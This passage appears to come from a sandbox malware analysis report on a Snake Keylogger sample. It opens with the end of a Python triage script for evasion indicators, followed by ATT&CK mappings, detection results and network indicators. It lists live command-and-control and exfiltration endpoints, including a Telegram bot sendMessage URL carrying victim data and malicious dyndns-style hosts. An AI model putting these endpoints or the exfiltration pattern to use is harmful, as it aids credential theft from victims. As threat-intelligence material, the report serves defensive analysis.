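    """True when successive delays shrink by a small positive amount (heuristic,
    consistent with a loop that re-sleeps for the time left until a deadline)."""
    if len(delays) < 3:
        return False
    steps = [a - b for a, b in zip(delays, delays[1:])]
    return all(0 < s <= max_step_ms for s in steps)


def triage(lines):
    """Summarise evasion and credential-access indicators from report lines."""
    delays, vm_hits, anti_debug, stores, other_opens = [], 0, set(), Counter(), []
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        if ev["event"] == "Thread delayed":
            m = re.search(r"delay time:\s*(\d+)", ev["detail"])
            if m:
                delays.append(int(m.group(1)))
        elif ev["event"] == "Binary or memory string" and VM_ARTIFACT_RE.search(ev["detail"]):
            vm_hits += 1
        elif ev["event"] == "Process queried" and ev["detail"] in ANTI_DEBUG_QUERIES:
            anti_debug.add(ev["detail"])
        elif ev["event"] in ("File opened", "Key opened"):
            label = classify_access(ev["detail"])
            if label:
                stores[label] += 1
            else:
                other_opens.append(ev["detail"])
    longest = max(delays, default=0)
    return {
        "sleep_events": len(delays),
        "max_delay_ms": longest,
        "long_sleep": longest >= LONG_SLEEP_MS,
        "countdown_pattern": countdown_pattern(delays),
        "vm_artifact_hits": vm_hits,
        "anti_debug": sorted(anti_debug),
        "credential_store_access": dict(stores),
        "other_opens": other_opens,
    }


if __name__ == "__main__":
    for key, value in triage(REPORT_LINES).items():
        print(f"{key}: {value}")
```

Run it on the whole evasion section pasted into REPORT_LINES and the sleep figures become the full 28-entry countdown; the parser accepts the lines as the page shows them, so no separator repair is needed first.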

                          Remote Access Functionality

                           Source: Yara match | File source: 00000000.00000002.1510453566.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                           Source: Yara match | File source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, type: SAMPLE
                           Source: Yara match | File source: 0.0.1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe.700000.0.unpack, type: UNPACKEDPE
                           Source: Yara match | File source: 00000000.00000000.1233370033.0000000000702000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                           Source: Yara match | File source: Process Memory Space: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe PID: 6764, type: MEMORYSTR
                           Source: Yara match | File source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, type: SAMPLE
                           Source: Yara match | File source: 0.0.1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe.700000.0.unpack, type: UNPACKEDPE
                           Source: Yara match | File source: 00000000.00000000.1233370033.0000000000702000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                           Source: Yara match | File source: Process Memory Space: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe PID: 6764, type: MEMORYSTR
MITRE ATT&CK matrix, listed per tactic (a number in front of a technique is the hit count shown in the report for that technique; techniques without a number are the matrix's unmatched placeholders):
Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS
Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services
Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services
Execution: Windows Management Instrumentation, Scheduled Task/Job, At, Cron, Launchd, Scheduled Task, Systemd Timers
Persistence: 1 DLL Side-Loading, Boot or Logon Initialization Scripts, Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items
Privilege Escalation: 1 Process Injection, 1 DLL Side-Loading, Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items
Defense Evasion: 1 Disable or Modify Tools, 41 Virtualization/Sandbox Evasion, 1 Process Injection, 1 Deobfuscate/Decode Files or Information, 2 Obfuscated Files or Information, 1 DLL Side-Loading, Compile After Delivery
Credential Access: 1 OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync
Discovery: 1 Query Registry, 21 Security Software Discovery, 1 Process Discovery, 41 Virtualization/Sandbox Evasion, 1 Application Window Discovery, 1 System Network Configuration Discovery, 13 System Information Discovery
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management
Collection: 1 Email Collection, 11 Archive Collected Data, 1 Data from Local System, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture
Command and Control: 1 Web Service, 11 Encrypted Channel, 3 Ingress Tool Transfer, 3 Non-Application Layer Protocol, 14 Application Layer Protocol, Multiband Communication, Commonly Used Port
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel
Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery

Source | Detection | Scanner | Label
1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | 66% | ReversingLabs | ByteCode-MSIL.Spyware.Snakekeylogger
1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | 100% | Avira | HEUR/AGEN.1307591
1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | 100% | Joe Sandbox ML | -
                          No Antivirus matches
                          No Antivirus matches
                          No Antivirus matches
Source | Detection | Scanner | Label
https://duckduckgo.com/chrome_newtab | 0% | URL Reputation | safe
https://duckduckgo.com/ac/?q= | 0% | URL Reputation | safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | URL Reputation | safe
http://upx.sf.net | 0% | URL Reputation | safe
http://checkip.dyndns.org | 0% | URL Reputation | safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe
https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe
http://varders.kozow.com:8081 | 0% | URL Reputation | safe
http://aborters.duckdns.org:8081 | 100% | URL Reputation | malware
https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe
http://checkip.dyndns.org/ | 0% | URL Reputation | safe
http://anotherarmy.dns.army:8081 | 100% | URL Reputation | malware
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe
http://checkip.dyndns.org/q | 0% | URL Reputation | safe
https://reallyfreegeoip.org | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded | 0% | URL Reputation | safe
https://reallyfreegeoip.org/xml/ | 0% | URL Reputation | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
reallyfreegeoip.org | 188.114.97.3 | true | true | - | unknown
api.telegram.org | 149.154.167.220 | true | true | - | unknown
checkip.dyndns.com | 158.101.44.242 | true | false | - | unknown
checkip.dyndns.org | unknown | unknown | true | - | unknown
Name | Malicious | Antivirus Detection | Reputation
https://reallyfreegeoip.org/xml/8.46.123.33 | false | - | unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:642294%0D%0ADate%20and%20Time:%2027/09/2024%20/%2015:33:28%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20642294%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | false | - | unknown
http://checkip.dyndns.org/ | false | URL Reputation: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
(In the Source column, "sample" stands for 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe; memory dumps are listed by their .sdmp identifier.)
https://www.office.com/ | sample, 00000000.00000002.1510453566.0000000002C49000.00000004.00000800.00020000.00000000.sdmp, sample, 00000000.00000002.1510453566.0000000002C3A000.00000004.00000800.00020000.00000000.sdmp | false | - | unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:642294%0D%0ADate%20a | sample, 00000000.00000002.1510453566.0000000002B68000.00000004.00000800.00020000.00000000.sdmp | false | - | unknown
https://duckduckgo.com/chrome_newtab | sample, 00000000.00000002.1512044852.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, sample, 00000000.00000002.1512044852.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://duckduckgo.com/ac/?q= | sample, 00000000.00000002.1512044852.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, sample, 00000000.00000002.1512044852.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://api.telegram.org | sample, 00000000.00000002.1510453566.0000000002B68000.00000004.00000800.00020000.00000000.sdmp | false | - | unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | sample, 00000000.00000002.1512044852.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, sample, 00000000.00000002.1512044852.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp | false | - | unknown
https://api.telegram.org/bot | sample | false | - | unknown
https://chrome.google.com/webstore?hl=enXL | sample, 00000000.00000002.1510453566.0000000002C08000.00000004.00000800.00020000.00000000.sdmp | false | - | unknown
https://www.office.com/lB | sample, 00000000.00000002.1510453566.0000000002C44000.00000004.00000800.00020000.00000000.sdmp | false | - | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | sample, 00000000.00000002.1512044852.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, sample, 00000000.00000002.1512044852.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://upx.sf.net | Amcache.hve.12.dr | false | URL Reputation: safe | unknown
http://checkip.dyndns.org | sample, 00000000.00000002.1510453566.0000000002A81000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | sample, 00000000.00000002.1512044852.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, sample, 00000000.00000002.1512044852.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text= | sample, 00000000.00000002.1510453566.0000000002B68000.00000004.00000800.00020000.00000000.sdmp | false | - | unknown
https://chrome.google.com/webstore?hl=en | sample, 00000000.00000002.1510453566.0000000002C17000.00000004.00000800.00020000.00000000.sdmp, sample, 00000000.00000002.1510453566.0000000002C08000.00000004.00000800.00020000.00000000.sdmp, sample, 00000000.00000002.1510453566.0000000002C49000.00000004.00000800.00020000.00000000.sdmp | false | - | unknown
https://www.ecosia.org/newtab/ | sample, 00000000.00000002.1512044852.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, sample, 00000000.00000002.1512044852.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://varders.kozow.com:8081 | sample | false | URL Reputation: safe | unknown
http://aborters.duckdns.org:8081 | sample | true | URL Reputation: malware | unknown
https://ac.ecosia.org/autocomplete?q= | sample, 00000000.00000002.1512044852.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, sample, 00000000.00000002.1512044852.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://reallyfreegeoip.org/xml/8.46.123.33$ | sample, 00000000.00000002.1510453566.0000000002B68000.00000004.00000800.00020000.00000000.sdmp, sample, 00000000.00000002.1510453566.0000000002AFC000.00000004.00000800.00020000.00000000.sdmp, sample, 00000000.00000002.1510453566.0000000002B41000.00000004.00000800.00020000.00000000.sdmp | false | - | unknown
http://anotherarmy.dns.army:8081 | sample | true | URL Reputation: malware | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | sample, 00000000.00000002.1512044852.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, sample, 00000000.00000002.1512044852.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://checkip.dyndns.org/q | sample | false | URL Reputation: safe | unknown
https://chrome.google.com/webstore?hl=enlB | sample, 00000000.00000002.1510453566.0000000002C12000.00000004.00000800.00020000.00000000.sdmp | false | - | unknown
https://reallyfreegeoip.org | sample, 00000000.00000002.1510453566.0000000002B68000.00000004.00000800.00020000.00000000.sdmp, sample, 00000000.00000002.1510453566.0000000002AD2000.00000004.00000800.00020000.00000000.sdmp, sample, 00000000.00000002.1510453566.0000000002B41000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.office.com/XL | sample, 00000000.00000002.1510453566.0000000002C3A000.00000004.00000800.00020000.00000000.sdmp | false | - | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | sample, 00000000.00000002.1510453566.0000000002A81000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | sample, 00000000.00000002.1512044852.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, sample, 00000000.00000002.1512044852.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded | sample | false | URL Reputation: safe | unknown
https://reallyfreegeoip.org/xml/ | sample | false | URL Reputation: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | true
188.114.97.3 | reallyfreegeoip.org | European Union | 13335 | CLOUDFLARENETUS | true
158.101.44.242 | checkip.dyndns.com | United States | 31898 | ORACLE-BMC-31898US | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1520417
Start date and time: 2024-09-27 10:46:36 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 57s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 19
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe
Detection: MAL
Classification: mal100.troj.spyw.winEXE@2/5@3/3
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 66
• Number of non-executed functions: 38
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 52.168.117.173
• Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Report size getting too big, too many NtSetInformationFile calls found.
• VT rate limit hit for: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe
Time | Type | Description
04:47:29 | API Interceptor | 98x Sleep call for process: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe modified
05:56:44 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
149.154.167.220 | #docs_8299010377388200191-pdf.js | malicious | Snake Keylogger, VIP Keylogger | -
149.154.167.220 | Dekont.rar.xlxs.pdf.exe | malicious | Snake Keylogger, VIP Keylogger | -
149.154.167.220 | VL1xZpPp1I.exe | malicious | DCRat, PureLog Stealer, zgRAT | -
149.154.167.220 | z64BLPL.exe | malicious | Snake Keylogger, VIP Keylogger | -
149.154.167.220 | TLS20242025.exe | malicious | Snake Keylogger, VIP Keylogger | -
149.154.167.220 | VbcXXnmIwPPhh.exe | malicious | Snake Keylogger, VIP Keylogger | -
149.154.167.220 | nBank_Report.pif.exe | malicious | Snake Keylogger | -
149.154.167.220 | z1Invoice1.bat.exe | malicious | VIP Keylogger | -
149.154.167.220 | ziraat bankasi_TRY Müşteri No_11055699-1034 nolu TICARI 26.09.2024.exe | malicious | Snake Keylogger | -
149.154.167.220 | SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe | malicious | Snake Keylogger, VIP Keylogger | -
188.114.97.3 | QUOTATION_SEPQTRA071244PDF.scr.exe | malicious | Snake Keylogger | filetransfer.io/data-package/mfctuvFf/download
188.114.97.3 | http://brawllstars.ru/ | malicious | HTMLPhisher | brawllstars.ru/
188.114.97.3 | http://aktiivasi-paylaterr.from-resmi.com/ | malicious | Unknown | aktiivasi-paylaterr.from-resmi.com/
188.114.97.3 | ECChG5eWfZ.exe | malicious | DCRat, PureLog Stealer, zgRAT | homker11.uebki.one/GeneratorTest.php
188.114.97.3 | HpCQgSai4e.exe | malicious | FormBook | www.zhxgtlw.top/bopi/?XtEdZRAP=tIrAt1o0vWdNGbj/SzADcCGpASEIYc8Vm+jYIgWXaQC1p/Id9tI9XA8Ni4J3RpZHG8N5&8p=DXgPYZ
188.114.97.3 | QUOTATION_SEPQTRA071244úPDF.scr.exe | malicious | Snake Keylogger | filetransfer.io/data-package/Ky4pZ0WB/download
188.114.97.3 | ADNOC requesting RFQ.exe | malicious | FormBook | www.1win-moldovia.fun/1g7m/
188.114.97.3 | http://www.tiktok758.com/ | malicious | Unknown | www.tiktok758.com/img/logo.4c830710.svg
188.114.97.3 | TRmSF36qQG.exe | malicious | FormBook | www.zhxgtlw.top/bopi/?0T5=UL08qvZHLtV&EnAHS=tIrAt1o0vWdNGbj/SzADcCGpASEIYc8Vm+jYIgWXaQC1p/Id9tI9XA8Ni4JOdI1EXss+
188.114.97.3 | PO5118000306 pdf.exe | malicious | FormBook | www.rtprajalojago.live/2wnz/
158.101.44.242 | Payment Advice.xls | malicious | Snake Keylogger | checkip.dyndns.org/
158.101.44.242 | Dekont.rar.xlxs.pdf.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
158.101.44.242 | dekont.pdf.exe | malicious | Snake Keylogger | checkip.dyndns.org/
158.101.44.242 | REMITTANCE ADVICE.xls | malicious | Snake Keylogger | checkip.dyndns.org/
158.101.44.242 | purchase order.exe | malicious | Snake Keylogger | checkip.dyndns.org/
158.101.44.242 | SecuriteInfo.com.Win32.CrypterX-gen.6879.11943.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
158.101.44.242 | RFQ____RM quotation_JPEG IMAGE.img.exe | malicious | Snake Keylogger | checkip.dyndns.org/
158.101.44.242 | Payment Details.doc | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
158.101.44.242 | Thyssenkrupp PO040232.doc | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
158.101.44.242 | Payment Slip.doc | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
Match: reallyfreegeoip.org
• Payment Advice.xls | malicious | Snake Keylogger | context: 188.114.96.3
• Ziraat Bankasi Swift Mesaji.exe | malicious | Snake Keylogger | context: 188.114.97.3
• #docs_8299010377388200191-pdf.js | malicious | Snake Keylogger, VIP Keylogger | context: 188.114.97.3
• Dekont.rar.xlxs.pdf.exe | malicious | Snake Keylogger, VIP Keylogger | context: 188.114.97.3
• dekont.pdf.exe | malicious | Snake Keylogger | context: 188.114.97.3
• Ziraat Bankasi Swift Mesaji.exe | malicious | Snake Keylogger | context: 188.114.97.3
• QUOTATION_SEPQTRA071244PDF.scr.exe | malicious | Snake Keylogger | context: 188.114.96.3
• REMITTANCE ADVICE.xls | malicious | Snake Keylogger | context: 188.114.97.3
• z64BLPL.exe | malicious | Snake Keylogger, VIP Keylogger | context: 188.114.97.3
• TLS20242025.exe | malicious | Snake Keylogger, VIP Keylogger | context: 188.114.97.3
Match: checkip.dyndns.com
• Payment Advice.xls | malicious | Snake Keylogger | context: 132.226.247.73
• Ziraat Bankasi Swift Mesaji.exe | malicious | Snake Keylogger | context: 193.122.130.0
• #docs_8299010377388200191-pdf.js | malicious | Snake Keylogger, VIP Keylogger | context: 132.226.8.169
• Dekont.rar.xlxs.pdf.exe | malicious | Snake Keylogger, VIP Keylogger | context: 158.101.44.242
• dekont.pdf.exe | malicious | Snake Keylogger | context: 158.101.44.242
• Ziraat Bankasi Swift Mesaji.exe | malicious | Snake Keylogger | context: 193.122.130.0
• QUOTATION_SEPQTRA071244PDF.scr.exe | malicious | Snake Keylogger | context: 132.226.247.73
• REMITTANCE ADVICE.xls | malicious | Snake Keylogger | context: 158.101.44.242
• z64BLPL.exe | malicious | Snake Keylogger, VIP Keylogger | context: 193.122.6.168
• TLS20242025.exe | malicious | Snake Keylogger, VIP Keylogger | context: 193.122.130.0
Match: api.telegram.org
• #docs_8299010377388200191-pdf.js | malicious | Snake Keylogger, VIP Keylogger | context: 149.154.167.220
• Dekont.rar.xlxs.pdf.exe | malicious | Snake Keylogger, VIP Keylogger | context: 149.154.167.220
• VL1xZpPp1I.exe | malicious | DCRat, PureLog Stealer, zgRAT | context: 149.154.167.220
• z64BLPL.exe | malicious | Snake Keylogger, VIP Keylogger | context: 149.154.167.220
• TLS20242025.exe | malicious | Snake Keylogger, VIP Keylogger | context: 149.154.167.220
• VbcXXnmIwPPhh.exe | malicious | Snake Keylogger, VIP Keylogger | context: 149.154.167.220
• nBank_Report.pif.exe | malicious | Snake Keylogger | context: 149.154.167.220
• z1Invoice1.bat.exe | malicious | VIP Keylogger | context: 149.154.167.220
• ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe | malicious | Snake Keylogger | context: 149.154.167.220
• SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe | malicious | Snake Keylogger, VIP Keylogger | context: 149.154.167.220
Match | Associated Sample Name / URL | Detection | Threat Name | Context
Match: TELEGRAMRU
• #docs_8299010377388200191-pdf.js | malicious | Snake Keylogger, VIP Keylogger | context: 149.154.167.220
• Dekont.rar.xlxs.pdf.exe | malicious | Snake Keylogger, VIP Keylogger | context: 149.154.167.220
• http://brawllstars.ru/ | malicious | HTMLPhisher | context: 149.154.167.99
• https://telagremn.com/ | malicious | Unknown | context: 149.154.167.99
• http://tg.hispa-net.com/ | malicious | Unknown | context: 149.154.167.99
• http://www.traderstv.net/ | malicious | Unknown | context: 149.154.167.99
• http://kapahereyupa.life/ | malicious | Unknown | context: 149.154.167.99
• http://sg2.putrivpn.us.kg/ | malicious | Unknown | context: 149.154.167.99
• https://telegramsexx21.pages.dev/ | malicious | Porn Scam | context: 149.154.167.99
• https://investors.spotify.com.id6.tingkehvpn.us.kg/ | malicious | Unknown | context: 149.154.167.99
Match: CLOUDFLARENETUS
• RFQ 2024.09.26-89 vivecta.vbs | malicious | PureLog Stealer | context: 172.66.0.235
• Payment Advice.xls | malicious | Snake Keylogger | context: 188.114.96.3
• Ziraat Bankasi Swift Mesaji.exe | malicious | Snake Keylogger | context: 188.114.97.3
• RTGS-WB-ABS-240730-NEW.lnk | malicious | AgentTesla | context: 172.67.74.152
• #docs_8299010377388200191-pdf.js | malicious | Snake Keylogger, VIP Keylogger | context: 162.159.129.233
• AGMETIGA zapytanie ofertowe.xls | malicious | PureLog Stealer | context: 172.67.179.215
• 175-33-26-24.HTA.hta | malicious | Unknown | context: 104.16.231.132
• Dekont.rar.xlxs.pdf.exe | malicious | Snake Keylogger, VIP Keylogger | context: 188.114.97.3
• dekont.pdf.exe | malicious | Snake Keylogger | context: 188.114.97.3
• Ziraat Bankasi Swift Mesaji.exe | malicious | Snake Keylogger | context: 188.114.97.3
Match: ORACLE-BMC-31898US
• Payment Advice.xls | malicious | Snake Keylogger | context: 158.101.44.242
• Ziraat Bankasi Swift Mesaji.exe | malicious | Snake Keylogger | context: 193.122.130.0
• Dekont.rar.xlxs.pdf.exe | malicious | Snake Keylogger, VIP Keylogger | context: 158.101.44.242
• dekont.pdf.exe | malicious | Snake Keylogger | context: 158.101.44.242
• Ziraat Bankasi Swift Mesaji.exe | malicious | Snake Keylogger | context: 193.122.130.0
• REMITTANCE ADVICE.xls | malicious | Snake Keylogger | context: 158.101.44.242
• z64BLPL.exe | malicious | Snake Keylogger, VIP Keylogger | context: 193.122.6.168
• TLS20242025.exe | malicious | Snake Keylogger, VIP Keylogger | context: 193.122.130.0
• purchase order.exe | malicious | Snake Keylogger | context: 158.101.44.242
• SecuriteInfo.com.Win32.CrypterX-gen.6879.11943.exe | malicious | Snake Keylogger, VIP Keylogger | context: 158.101.44.242
Match | Associated Sample Name / URL | Detection | Threat Name | Context
Match: 54328bd36c14bd82ddaa0c04b25ed9ad
• Ziraat Bankasi Swift Mesaji.exe | malicious | Snake Keylogger | context: 188.114.97.3
• #docs_8299010377388200191-pdf.js | malicious | Snake Keylogger, VIP Keylogger | context: 188.114.97.3
• Dekont.rar.xlxs.pdf.exe | malicious | Snake Keylogger, VIP Keylogger | context: 188.114.97.3
• dekont.pdf.exe | malicious | Snake Keylogger | context: 188.114.97.3
• Ziraat Bankasi Swift Mesaji.exe | malicious | Snake Keylogger | context: 188.114.97.3
• QUOTATION_SEPQTRA071244PDF.scr.exe | malicious | Snake Keylogger | context: 188.114.97.3
• SecuriteInfo.com.Adware.DownwareNET.4.15389.24193.exe | malicious | Unknown | context: 188.114.97.3
• SecuriteInfo.com.Adware.DownwareNET.4.15389.24193.exe | malicious | Unknown | context: 188.114.97.3
• z64BLPL.exe | malicious | Snake Keylogger, VIP Keylogger | context: 188.114.97.3
• TLS20242025.exe | malicious | Snake Keylogger, VIP Keylogger | context: 188.114.97.3
Match: 3b5074b1b5d032e5620f69f9f700ff0e
• Teklif-6205018797-6100052155-UUE.exe | malicious | AgentTesla | context: 149.154.167.220
• RFQ 2024.09.26-89 vivecta.vbs | malicious | PureLog Stealer | context: 149.154.167.220
• RTGS-WB-ABS-240730-NEW.lnk | malicious | AgentTesla | context: 149.154.167.220
• #docs_8299010377388200191-pdf.js | malicious | Snake Keylogger, VIP Keylogger | context: 149.154.167.220
• Dekont.rar.xlxs.pdf.exe | malicious | Snake Keylogger, VIP Keylogger | context: 149.154.167.220
• https://ojbkjs.vip/yb.js | malicious | Unknown | context: 149.154.167.220
• QUOTATION_SEPQTRA071244PDF.scr.exe | malicious | Snake Keylogger | context: 149.154.167.220
• file.exe | malicious | Unknown | context: 149.154.167.220
• Purchase order.exe | malicious | AgentTesla | context: 149.154.167.220
• https://jbrizuelablplegal.taplink.ws/ | malicious | HTMLPhisher | context: 149.154.167.220
                                                                                  No context
                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):65536
                                                                                  Entropy (8bit):1.2327646232540128
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:S0CQMBYscDRb0BU/KaGyFuyRCzuiFWZ24IO8x:GwsoeBU/KaVPRCzuiFWY4IO8x
                                                                                  MD5:0BEB4EF1C4704A1F31B7B0FA9DE92B7D
                                                                                  SHA1:AE8B8127BB80F96B7CB762EC21D736077143B5ED
                                                                                  SHA-256:45B41520305A46B60956289697C0530439614721C4351DAA9D9E8696E2D06C73
                                                                                  SHA-512:F25963BE024F3B6AA13B3F33DD7DD82E1F01F2A19AB00584F00EF57C02FF0EFB7F9738BA5DC033DC6987C2DE89719B73158846DB543E916BBBC6807924CD8BB5
                                                                                  Malicious:false
                                                                                  Reputation:low
